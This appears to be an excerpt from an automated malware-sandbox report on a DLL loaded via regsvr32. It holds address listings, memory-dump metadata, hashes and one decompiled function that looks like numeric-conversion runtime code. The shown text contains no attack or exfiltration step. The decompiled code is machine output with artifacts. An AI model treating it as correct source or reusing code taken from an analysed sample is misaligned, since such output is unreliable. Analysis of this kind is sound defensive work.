                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3bb424f7e8c0e80f235ff7bb4e683e2afb796d2e621659135847fbeb61c1a3e8
                                                                              • Instruction ID: f2c3ffa47aebc13c350b0776acee1ea9ad77c53d68661746e3f2f99ab4a7d76c
                                                                              • Opcode Fuzzy Hash: 3bb424f7e8c0e80f235ff7bb4e683e2afb796d2e621659135847fbeb61c1a3e8
                                                                              • Instruction Fuzzy Hash: 7951F5776287D5C6D760CF26E0047AEB7A1F395780FA1412AEA89C3A68DB79D441CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004EFB9 Relevance: .2, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004EFB9(void* __ebx, void* __edx, signed int __ebp, void* __r8, void* __r11, long long* __r13, void* __r15, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t135;
				signed int _t136;
				signed short _t146;
				signed short _t147;
				signed short _t151;
				signed short _t152;
				signed int _t153;
				signed int _t157;
				signed int _t159;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed char _t176;
				void* _t177;
				signed int _t178;
				signed int _t179;
				signed short _t180;
				signed short _t181;
				signed int _t183;
				signed int _t187;
				signed int _t191;
				signed short _t195;
				signed int _t196;
				signed int _t200;
				void* _t201;
				signed int _t202;
				signed int _t205;
				signed int _t206;
				void* _t214;
				signed long long _t220;
				void* _t221;
				void* _t223;
				long long _t225;
				signed int* _t226;
				long long _t228;
				void* _t230;
				signed long long _t233;
				long long _t236;
				void* _t238;
				signed int* _t239;
				void* _t240;
				signed int _t241;
				void* _t242;
				char* _t243;
				signed short* _t244;
				long long* _t246;
				signed int* _t249;

				_t246 = __r13;
				_t242 = __r11;
				_t235 = __r8;
				_t206 = __ebp;
				_t177 = __ebx;
				r15d = 1;
				if(__edx - 0x30 > 9) {
					_t236 = _t228;
					_t200 = 0;
					goto L6;
				} else {
					r9d = __r15 + 3;
					_t235 = __r8 - __r15;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t200 = 0;
					__eflags = 0;
					L6:
					__eflags = _t206;
					 *_t246 = _t236;
					if(_t206 == 0) {
						r8d = _t200;
						_t191 = _t200;
						_t200 = 4;
						L100:
						_t179 = 0;
						_t135 = 0;
						__eflags = 0;
						L101:
						_t239 = _a72;
						_t136 = _t135 | _a52;
						__eflags = _t136;
						_t239[2] = _t136;
						 *_t239 = _t179;
						_t239[0] = _t191;
						_t239[1] = r8d;
						__eflags = _a160 ^ _t233;
						return E10038D20(_t179, _a160 ^ _t233);
					}
					__eflags = r10d - 0x18;
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t200;
							_t191 = _t200;
							goto L100;
						}
						L13:
						_t243 = _t242 - 1;
						__eflags =  *_t243;
						if( *_t243 != 0) {
							L16:
							_t9 =  &_a96; // 0x61
							_t10 =  &_a128; // 0x81
							E10052690(r10d, _t214, _t10, _t223, _t228, _t230, _t9, _t238, _t240, _t243);
							__eflags = r14d;
							if(r14d >= 0) {
								r8d = _a48;
							} else {
								r8d = _a48;
								r8d =  ~r8d;
							}
							r8d = r8d + _t177;
							__eflags = r12d;
							if(r12d == 0) {
								r8d = r8d + _a288;
								__eflags = r8d;
							}
							__eflags = r15d;
							if(r15d == 0) {
								r8d = r8d - _a296;
								__eflags = r8d;
							}
							__eflags = r8d - 0x1450;
							if(r8d > 0x1450) {
								_t191 = _t200;
								_t135 = 0x7fff;
								r8d = 0x80000000;
								_t200 = 2;
								_t179 = 0;
								goto L101;
							} else {
								__eflags = r8d - 0xffffebb0;
								if(r8d < 0xffffebb0) {
									r8d = _t200;
									_t191 = _t200;
									_t200 = 1;
									goto L100;
								}
								_t225 = 0x10070ac0;
								__eflags = r8d;
								if(r8d == 0) {
									L95:
									_t179 = _a96 & 0x0000ffff;
									_t191 = _a98;
									r8d = _a102;
									_t135 = _a104 >> 0x10;
									goto L101;
								}
								__eflags = r8d;
								if(r8d < 0) {
									r8d =  ~r8d;
									_t225 = 0x10070c20;
									__eflags = 0x10070c80;
								}
								__eflags = _a56;
								_t142 =  ==  ? 0 : _a96 & 0x0000ffff;
								__eflags = r8d;
								_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
								if(r8d == 0) {
									_t200 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t225 = _t225 + 0x54;
										r8d = r8d >> 3;
										__eflags = r8d & 0x00000007;
										_a48 = r8d;
										_a64 = _t225;
										if((r8d & 0x00000007) == 0) {
											goto L92;
										}
										_t220 = _t210 + _t210 * 2;
										__eflags =  *((short*)(_t225 + _t220 * 4)) - 0x8000;
										_t249 = _t225 + _t220 * 4;
										if( *((short*)(_t225 + _t220 * 4)) >= 0x8000) {
											_t26 =  &_a112; // 0x71
											_t220 = _t26;
											 *_t220 =  *_t249;
											_t173 = _t249[2];
											_t28 =  &_a112; // 0x71
											_t249 = _t28;
											 *(_t220 + 8) = _t173;
											_t210 = _a112 >> 0x10;
											_t174 = _t173 - 1;
											__eflags = _t174;
											_a114 = _t174;
										}
										_t180 = _t249[2] & 0x0000ffff;
										_t146 = _a106 & 0x0000ffff;
										r15d = 0;
										_t181 = _t180 & 0x00007fff;
										_a80 = 0;
										_t147 = _t146 & 0x00007fff;
										_a84 = 0;
										_t195 = (_t180 & 0x0000ffff ^ _t146) & 0x00008000;
										__eflags = _t147 - 0x7fff;
										_a88 = 0;
										_a56 = _t195;
										_t201 = _t210 + _t220;
										if(_t147 >= 0x7fff) {
											L91:
											__eflags = _t195;
											_t225 = _a64;
											_t149 =  !=  ? r9d : 0x7fff8000;
											_a100 = 0;
											_a96 = 0;
											_a104 =  !=  ? r9d : 0x7fff8000;
										} else {
											__eflags = _t181 - 0x7fff;
											if(_t181 >= 0x7fff) {
												goto L91;
											}
											__eflags = _t201 - 0xbffd;
											if(_t201 > 0xbffd) {
												goto L91;
											}
											__eflags = _t201 - 0x3fbf;
											if(_t201 > 0x3fbf) {
												__eflags = _t147;
												if(_t147 != 0) {
													L43:
													__eflags = _t181;
													if(_t181 != 0) {
														L48:
														r13d = 0;
														_t226 =  &_a84;
														r12d = 5;
														do {
															__eflags = r12d;
															_t178 = r12d;
															_t221 = _t246 + _t246;
															if(r12d <= 0) {
																goto L63;
															}
															_t56 =  &(_t249[2]); // 0x9
															_t241 = _t56;
															_t58 = _t221 + 0x60; // 0x65
															_t244 = _t233 + _t58;
															_t205 = r13d & 0x00000001;
															__eflags = _t205;
															do {
																_t183 = ( *_t244 & 0x0000ffff) * ( *_t241 & 0x0000ffff);
																__eflags = _t205;
																if(_t205 == 0) {
																	r8d = 0;
																	r9d = _t210 + _t221;
																	__eflags = r9d -  *(_t226 - 4);
																	if(r9d <  *(_t226 - 4)) {
																		L58:
																		r8d = 1;
																		L59:
																		 *(_t226 - 4) = r9d;
																		goto L60;
																	}
																	__eflags = r9d - _t183;
																	if(r9d >= _t183) {
																		goto L59;
																	}
																	goto L58;
																}
																r8d = 0;
																r9d = _t210 + _t221;
																__eflags = r9d -  *(_t226 - 4);
																if(r9d <  *(_t226 - 4)) {
																	L54:
																	r8d = 1;
																	L55:
																	 *(_t226 - 4) = r9d;
																	goto L60;
																}
																__eflags = r9d - _t183;
																if(r9d >= _t183) {
																	goto L55;
																}
																goto L54;
																L60:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t226 =  *_t226 + 1;
																	__eflags =  *_t226;
																}
																_t178 = _t178 - 1;
																_t244 =  &(_t244[1]);
																_t241 = _t241 - 2;
																__eflags = _t178;
															} while (_t178 > 0);
															L63:
															r12d = r12d - 1;
															_t226 =  &(_t226[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t202 = _t201 + 0xc002;
														__eflags = _t202;
														if(__eflags <= 0) {
															r8d = _a88;
															_t196 = _a84;
															r9d = _a80;
															L78:
															_t202 = _t202 + 0xffff;
															__eflags = _t202;
															if(_t202 >= 0) {
																L70:
																_t151 = _a80 & 0x0000ffff;
																L71:
																__eflags = _t151 - 0x8000;
																if(_t151 > 0x8000) {
																	L73:
																	_t152 = _a82;
																	__eflags = _t152 - 0xffffffff;
																	if(_t152 != 0xffffffff) {
																		_t153 = _t152 + 1;
																		__eflags = _t153;
																		_a82 = _t153;
																		_t196 = _a84;
																	} else {
																		_t157 = _a86;
																		_a82 = 0;
																		__eflags = _t157 - 0xffffffff;
																		if(_t157 != 0xffffffff) {
																			_a86 = _t157 + 1;
																			r8d = _a88;
																			_t196 = _a84;
																		} else {
																			_t159 = _a90 & 0x0000ffff;
																			_a86 = 0;
																			__eflags = _t159 - 0xffff;
																			if(_t159 != 0xffff) {
																				_t196 = _a84;
																				_a90 = _t159 + 1;
																				r8d = _a88;
																			} else {
																				_t196 = _a84;
																				_a90 = 0x8000;
																				r8d = _a88;
																				_t202 = _t202 + 1;
																			}
																		}
																	}
																	L88:
																	__eflags = _t202 - 0x7fff;
																	if(_t202 < 0x7fff) {
																		_a98 = _t196;
																		_t225 = _a64;
																		_a102 = r8d;
																		r8d = _a48;
																		_a96 = _a82 & 0x0000ffff;
																		_a106 = _t202 | _a56;
																		r9d = 0xffff8000;
																	} else {
																		__eflags = _a56;
																		_t225 = _a64;
																		r8d = _a48;
																		r9d = 0xffff8000;
																		_a100 = 0;
																		_t156 =  !=  ? r9d : 0x7fff8000;
																		_a96 = 0;
																		_a104 =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L92;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L88;
																}
																goto L73;
															}
															r10d =  ~(_t202 & 0x0000ffff) & 0x0000ffff;
															_t202 = _t202 + r10w;
															__eflags = _t202;
															do {
																__eflags = _a80 & 0x00000001;
																if((_a80 & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t196 << 0x0000001f;
																r8d = r8d >> 1;
																_t196 = _t196 >> 0x00000001 | r8d << 0x0000001f;
																_t241 = _t241 - 1;
																__eflags = _t241;
																_a80 = r9d;
															} while (_t241 != 0);
															__eflags = r15d;
															_a84 = _t196;
															_a88 = r8d;
															if(r15d == 0) {
																goto L70;
															}
															_t151 = r9w | 0x00000001;
															_a80 = _t151;
															r9d = _a80;
															goto L71;
														}
														r8d = _a88;
														_t196 = _a84;
														r9d = _a80;
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t187 = _t196 >> 0x1f;
															r9d = r9d + r9d;
															_t196 = _t196 + _t196 | r9d >> 0x0000001f;
															r8d = r8d | _t187;
															_t202 = _t202 + 0xffff;
															_a84 = _t196;
															_a88 = r8d;
															__eflags = _t202;
															_a80 = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L78;
														}
														__eflags = _t202;
														if(_t202 <= 0) {
															goto L78;
														}
														goto L70;
													}
													_t201 = _t201 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t249[2];
													if(_t249[2] != 0) {
														goto L48;
													}
													__eflags = _t249[1];
													if(_t249[1] != 0) {
														goto L48;
													}
													__eflags =  *_t249;
													if( *_t249 != 0) {
														goto L48;
													}
													_t225 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
													goto L92;
												}
												_t201 = _t201 + 1;
												asm("btr eax, 0x1f");
												__eflags = _a104;
												if(_a104 != 0) {
													goto L43;
												}
												__eflags = _a100;
												if(_a100 != 0) {
													goto L43;
												}
												__eflags = _a96;
												if(_a96 != 0) {
													goto L43;
												}
												_t225 = _a64;
												_a106 = 0;
												goto L92;
											}
											_t225 = _a64;
											_a104 = 0;
											_a100 = 0;
											_a96 = 0;
										}
										L92:
										__eflags = r8d;
									} while (r8d != 0);
									_t200 = 0;
								}
								goto L95;
							}
						}
						do {
							_t243 = _t243 - 1;
							r10d = r10d + 0xffffffff;
							_t177 = _t177 + 1;
							__eflags =  *_t243;
						} while ( *_t243 == 0);
						goto L16;
					}
					_t175 = _a151 & 0x000000ff;
					__eflags = _t175 - 5;
					if(_t175 >= 5) {
						_t176 = _t175 + 1;
						__eflags = _t176;
						_a151 = _t176;
					}
					_t242 = _t242 - 1;
					r10d = 0x18;
					_t177 = _t177 + 1;
					goto L13;
				}
				L1:
				_t235 = _t235 + 1;
				if(r9d <= 0xb) {
					_t210 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}


















































                                                                              0x1004efb9
                                                                              0x1004efb9
                                                                              0x1004efb9
                                                                              0x1004efb9
                                                                              0x1004efb9
                                                                              0x1004efbc
                                                                              0x1004efc5
                                                                              0x1004f180
                                                                              0x1004f183
                                                                              0x00000000
                                                                              0x1004efcb
                                                                              0x1004efcb
                                                                              0x1004efcf
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
